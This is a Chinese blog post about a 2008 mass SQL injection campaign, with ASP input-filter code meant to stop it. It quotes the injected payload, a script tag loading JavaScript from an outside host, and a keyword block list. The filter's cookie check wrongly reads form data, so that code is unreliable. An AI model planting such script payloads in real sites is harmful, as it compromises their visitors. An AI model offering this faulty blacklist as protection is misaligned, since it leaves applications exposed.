解决大范围SQL注入攻击的问题

最新推荐文章于 2024-08-13 07:00:14 发布
最新推荐文章于 2024-08-13 07:00:14 发布
阅读量1.3k 收藏
点赞数
文章标签: sql each 语言 数据库 服务器 cookies
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zkyliufeng/article/details/2463726
版权

        据IDG新闻 服务 5月19日报道,中国大陆和中国台湾地区数以千计的网站正在遭受大规模的SQL注入攻击。由于采用了非常强的SQL注入攻击手段,因此将会给很多目标网站带来不可逆转的破坏,数以千计的网站被卷入到了这次攻击中,截止上周五已经有超过1万个服务器被植入了恶意代码,而其中的大部分都位于中国大陆,还有一少部分位于中国台湾地区。搜房网和深圳汽车大世界网都沦为了上周五的攻击目标。

     受到攻击的服务器数据库表中所有字符字段都被加入“"></"></title><script src=http://s.see9.us/s.js></script><!--“通过查询和参考相关材料,用asp语言整理出以下代码可以解决(其他语言可以按其原理重新编写)上述问题,这段代码有三个特点:

1.用lcase防范大写的sql注入代码

2,分别防范来自Request.QueryString,Request.Form,Request.cookies三个方面的危险

3。直接将代码拷进数据库链接文件,例如asp语言的可以添加到conn文件中。

防范代码如下:(希望更多高手提出意见)

SQL_injdata = "'|exec|insert|select|delete|update|count|iframe|script|chr|mid|master|truncate|char|declare|*|%|and"
SQL_inj = split(SQL_Injdata,"|")

'QueryString请求的注入的拦截
If Request.QueryString<>"" Then
For Each SQL_Get In Request.QueryString
For SQL_Data=0 To Ubound(SQL_inj)
if instr(lcase(Request.QueryString(SQL_Get)),Sql_Inj(Sql_DATA))>0 Then
Response.write "您提交的内容含有非法字符"
Response.end
end if
next
Next
End If


'Get请求的注入的拦截
If Request.Form<>"" Then
For Each Sql_Post In Request.Form
For SQL_Data=0 To Ubound(SQL_inj)
if instr(lcase(Request.Form(Sql_Post)),Sql_Inj(Sql_DATA))>0 Then
Response.write "您提交的内容含有非法字符"
Response.end
end if
next
next
end if

'cookies请求的注入的拦截 

If Request.cookies<>"" Then
For Each Sql_Post1 In Request.cookies
For SQL_Data=0 To Ubound(SQL_inj)
if instr(lcase(Request.Form(Sql_Post1)),Sql_Inj(Sql_DATA))>0 Then
Response.write "您提交的内容含有非法字符"
Response.end
end if
next
next
end if

 

 

zkyliufeng
关注
SQL注入原理与解决方法代码示例
09-09
总之,SQL注入是Web应用程序安全的一个重要问题,开发者需要对用户输入进行严格控制,并采用预编译语句等安全措施来防止此类攻击。同时,定期进行安全审计和更新安全策略也是保持系统安全的关键。
sql注入详解
m0_67392811的博客
06-12 6056
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
2020-10-10
不二的博客
10-10 987
一:什么是sql注入   SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至篡改数据库。 二:SQL注入攻击的总体思路    1:寻找到SQL注入的位置   2:判断服务器类型和后台数据库类型   3:针对不同的服务器数据库特点进行SQL注入攻击 三:SQL注入攻击实例 String sql = "select * from user_table where username= ' "+us..
浅谈SQL注入,看完就知道到底怎么个事儿了~
最新发布
Maricopig的博客
08-13 833
注入产生的原因是后台服务器在接收相关参数时未做好过滤直接带入到数据库中查询,导致可以拼接执行构造的SQL语句。
SQL注入相关问题总结
Bossfrank的博客
04-21 1344
本文介绍了SQL注入相关问题,包括各种SQL的注入类型、防御手段、绕过方法等。也可以作为面试的复习参考。
SQL注入
热门推荐
m0_51457307的博客
11-08 2万+
一、什么是SQL注入 SQL注入SQL lnjection)是发生在Web程序中数据库层的安全漏洞,是比较常用的网络攻击方式之一,他不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至修改数据库。也就是说,SQL注入就是在用户输入的字符串中添加SQL语句,如果在设计不良的程序中忽略了检查,那么这些注入进去的SQL语句就会被数据库服务器误认为是正常的SQL语句而运行,攻击者就可以执行计划外的命令或者访问未授权的数据。 二、SQL注入的原理 1.恶意拼接查
SQL注入总结
qq_46081990的博客
04-22 4479
SQL注入是一种将SQL代码插入或添加到应用(用户)的输入参数中的攻击,之后再将这些参数传递给后台的sql服务器加以解析和执行。由于sql语句本身的多样性,以及可用于构造sql语句的编程方法很多,因此凡是构造sql语句的步骤均存在被攻击的潜在风险。Sql注入的方式主要是直接将代码插入参数中,这些参数会被置入sql命令中加以执行。间接的攻击方式是将恶意代码插入字符串中,之后将这些字符串保存到数据库的数据表中或将其当成元数据。当将存储的字符串置入动态sql命令中时,恶意代码就将被执行。
基于信息携带的SQL注入攻击检测方法.pdf
09-19
解决上述问题,南京邮电大学计算机学院的研究人员程希和曹晓梅提出了一种基于信息携带的SQL注入攻击检测方法,旨在提高检测的准确性和效率。该方法在传统机器学习检测的基础上,增加了标记器和内容匹配模块。标记...
一次sql注入问题的筛查报告 ,主要 是sql 注入的问题
05-10
以下是对"一次SQL注入问题的筛查报告"的详细分析和相关知识点的介绍: 一、SQL注入的基础知识 1. SQL注入原理:当用户输入的数据未经处理就直接拼接到SQL查询语句中时,攻击者可以通过构造特殊输入,使得查询执行非...
sql被注入解决代码
05-19
标题与描述中的关键词“SQL被注入解决代码”指向了防止SQL注入攻击的一种解决方案。SQL注入是一种常见的网络安全攻击方式,攻击者通过将恶意SQL语句插入到应用程序的数据输入字段中,以此来操纵数据库执行非授权操作...
php is_numberic函数造成的SQL注入漏洞
09-04
这种灵活性在某些情况下非常有用,但也为潜在的SQL注入攻击敞开了大门。 二、安全问题分析 当开发者使用`is_numeric`来验证用户输入,并直接将结果插入到SQL查询中,例如: ```php $s = is_numeric($_GET['s']) ?...
SQL注入的一些示例及解决SQL注入的方法
weixin_43618785的博客
03-09 8844
解决SQL注入的方法
Sql注入详解(原理篇)
Naive的博客
09-11 1万+
SQL 注入漏洞非常复杂,区分各种数据库类型,提交方法,数据类型等注入,同样此类漏洞是WEB安全中严重的安全漏洞,学习如何利用,挖掘,修复也是很重要的。SQL 注入就是指 Web 应用程序对用户输入的数据合法性没有过滤或者是判断,攻击者可以在Web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
sql注入相关问题解决方式?
qq_45635347的博客
08-24 281
SQL注入是一种常见的网络安全漏洞,它利用了未正确过滤或转义用户数据的漏洞,攻击者可以通过恶意构造的输入,将SQL命令注入到应用程序的数据库查询中,从而执行未经授权的操作。在开发和部署应用程序时,加强对SQL注入漏洞的意识并采取相应的防护措施是至关重要的,以保护应用程序和用户数据的安全。1. 数据泄露:攻击者可以通过注入恶意的SQL语句来查询、修改或删除数据库中的数据,导致敏感信息泄露。2. 数据篡改:攻击者可以通过注入恶意的SQL语句来修改数据库中的数据,破坏数据的完整性。
SQL注入详解
m0_67391121的博客
07-28 3725
WAF(WebApplicationFirewall)的中文名称叫做“Web应用防火墙”,利用国际上公认的一种说法,WAF的定义是这样的Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。通过从上面对WAF的定义中,我们可以很清晰的了解到,WAF是一种工作在应用层的、通过特定的安全策略来专门为Web应用提供安全防护的产品。...
SQL注入问题
哥的时代,为你保驾护航
05-20 116
问题描述:在初学javaWeb的时候,我们在进行数据库连接时会用一些sql语句来实现对数据库的增删改查操作,但当我们去实现一个简单的登录程序时,如果我们用平常的sql语句(比如直接获取登录时的用户名,然后用select语句去实现对数据库的查找操作,如果存在用户名,那就比较密码是否正确,如果不存在用户名,那直接返回错误)可能会出现sql注入问题:用户名'or1=1;Statement会将sql语句整成字符串的形式,所以在解决sql注入问题时,就不能用Statement类。
SQL注入攻击及防范措施
tt5464的博客
05-20 814
SQL注入攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入
SQL 注入总结(详细)
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
01-21 7148
这篇文章是最近学习 SQL 注入后的笔记,里面整理了 SQL 常见的注入方式,供大家学习了解 SQL 注入的原理及方法,也方便后续自己回顾,如有什么错误的地方欢迎指出!
薄纱全网 史上最全SQL注入漏洞总结
MachineGunJoe666
07-07 1150
注入漏洞在十大Web安全漏洞之中,其主要原因是对用户的输入过滤不严,导致程序以危险的方式运行,注入漏洞应用最广泛,杀伤力也很大如最常见的sql注入,命令注入,还有代码注入、xss等。最常见的Web漏洞之一,作用对象在数据库中,程序没有对用户输入数据的合法性进行验证和过滤,导致sql查询语句被恶意拼接,sql注入漏洞存在的条件:参数用户可控、参数可以动态拼接sql语句并带入数据库查询、参数过滤不严。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值